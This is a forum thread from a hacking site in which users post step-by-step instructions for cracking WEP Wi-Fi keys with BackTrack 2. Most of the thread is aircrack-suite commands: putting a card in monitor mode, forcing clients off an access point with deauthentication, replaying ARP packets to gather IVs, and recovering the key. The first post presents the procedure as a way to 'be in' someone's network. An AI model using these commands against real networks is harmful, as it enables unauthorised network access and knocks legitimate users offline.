Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

BackTrack 2 wep key cracking

  1. Home
  2. Forum
  3. Hacking in general
  4. BackTrack 2 wep key cracking

ghost's Avatar

ghost

0 0

I have got back track 2 and I was confused on eather the syntax of the commands them self or if i just diddent configure everything correctly. So to help others Here is what i have, I run iwconfig and set the wireless card to listen (iwconfig wlan0 mode moniter) next i need to run kismet (when i run kismet it telles me i need to configure it! and to refer to the .doc i did not know how/ or where it was but thats ok ther is an alternitave, airodump. so i get it all setup (airodump wlan0 dump channel 1)

-new window- now i need to inject the packets so i can increase the IV's rapidly. so i (aireplay -0 10 -1 "mac adress of AP" -c "client mac adress" wlan0) {this was to kick the other user off of the ap and re authenticate}

-new window- now to the injection (aireplay -3 -b "mac adress of AP" -h "client mac adress" -x 500 wlan0)

now the numbers should increase after a while 500,000 iv's or so later time to crack them

-new window- (aircrack -a 1 -b "mac adress of ap" dump.ivs) this tells air crack that it should be trying to break the key here is another method to use that is sometimes faster (aircrack -a 1 -i 1 -n 64 -m "mac aderss of client" -b "mac adress of ap" dump.ivs)

and now you should get a wep key jot it down on a peice of paper reboot to windows and enter the key twice with out the : and now you should be in!

(if anyone sees anything i need to add or if there is an error please let me know or, edit it thx Exidous) PS: I need a sig


ghost's Avatar

ghost

0 0

for you to use kismet on backtrack you have to edit kismet's conf sudo kedit /usr/local/etc/kismet.conf

find the line, source=none,none,none which is source=drivername,devicename,namegiven for example mine is because i use the patched ipwraw drivers: source=ipw3945,wifi0,Intel

others for example are: source=ipw3945,eth1,intel source=orinoco,eth1,kismet etc.

then kismet will run, and run happy. Lucky you having a card and drivers that inject and enter monitor mode nicely. Few are so fortunate.


ghost's Avatar

ghost

0 0

hmm..

I've never had to get 500K IV's to crack a wep, usually just 50K; I usually go about it kinda like this:

markupAirmon-ng start rausb0

airodump-ng rasub0

i find the target AP, and a client that is on, then i use client's mac address in an arp attack

then i restart airodump to capture the packets i want

markupairodump-ng --channel 6 -w dumpfile rausb0

then i start the arp attack

aireplay-ng -3 -b <AP MAC> -h <AP Client's MAC> rausb0

i wait to 50K iv's then i crack it in less than a few seconds..